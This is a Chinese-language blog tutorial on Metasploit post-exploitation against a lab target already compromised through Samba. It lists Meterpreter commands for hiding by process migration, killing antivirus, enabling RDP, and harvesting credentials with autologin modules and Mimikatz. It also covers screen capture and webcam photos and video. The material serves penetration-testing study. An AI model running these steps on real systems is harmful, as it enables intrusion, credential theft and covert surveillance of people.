美文网首页
利用MSF进行后渗透攻击

利用MSF进行后渗透攻击

作者: 鸡翅儿 | 来源:发表于2018-12-24 14:58 被阅读0次

    本篇主要讲利用MSF获取靶机shell后可进行的操作及利用方式
    前提:已经通过Samba服务漏洞获取了Meterpreter shell,利用方式可参考https://www.jianshu.com/p/839ac7af5e4c

    后渗透攻击:信息搜集

    进程迁移

    刚获取的Meterpreter shell非常脆弱易受攻击,例如攻击者可以利用浏览器漏洞攻陷目标机器,攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动进程,将它和目标机中一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作。(渗透更难被检测)

    1. 使用 ps命令获取靶机正在运行的进程

      1.png
    2. 使用getpid命令查看Meterpreter Shell 的进程号

      2.png
    3. 使用migrate PID命令迁移进程,进程迁移后会自动关闭原来进程,没有关闭可使用 kill pid 命令关闭进程。或者使用自动迁移进程(run post/windows/manage/migrate)命令,系统会自动寻找合适的进程然后迁移

      3.png

    系统命令

    获得稳定进程后,收集系统信息

    1. 使用sysinfo 命令查看目标机的系统信息

      4.png
    2. 输入run post/windows/gather/checkvm 命令查看靶机是否允许在虚拟机上

      5.png
    3. 检查靶机是否正在运行,使用 idletime查看靶机最近运行的时间

      6.png
    4. 使用route命令查看靶机完整的网络设置

      7.png
    5. background 命令可将当前会话放置后台,适合在多个Meterpreter 会话的场景下使用。使用 getuid 命令查看当前靶机已经渗透成功的用户名


      8.png
    6. 使用run post/windows/manage/killav命令关闭靶机系统杀毒软件

      9.png
    7. 使用run post/windows/manage/enable_rdp命令启动靶机远程桌面协议

      10.png
    8. 使用background命令将当前Meterpreter终端隐藏在后台

    9. sessions -i 重新调用终端

      11.png
    10. 使用 run post/windows/gather/enum_logged_on_users列举当前登录靶机用户

      12.png
    11. 使用 run post/windows/gather/enum_applications 列举安装在靶机上的应用程序

      13.png
    12. 很多用户习惯将计算机设置自动登录,可以使用 run windows/gather/credentials/windows_autologin 抓取自动登录的用户名和密码

      14.png
    • Mimikatz 抓取密码
      使用load mimikatz命令加载模块,msv抓取
      15.png
      解密一下成功获取密码
      16.png
    1. 没有抓取到,此时可利用扩展插件Espia 抓取靶机屏幕截图。使用 load espia 命令加载插件,screengrab或者 screenshot 命令抓取截图
      16.png

    一些其他可利用的命令

    webcam_list
    查看靶机是否有摄像头
    webcam_snap
    打开靶机摄像头拍一张照片
    webcam_stream
    开启直播模式,抓取视频

    参考链接:
    https://www.cnblogs.com/bmjoker/p/10151708.html

    相关文章

      网友评论

          本文标题:利用MSF进行后渗透攻击

          本文链接:https://www.haomeiwen.com/subject/bsmakqtx.html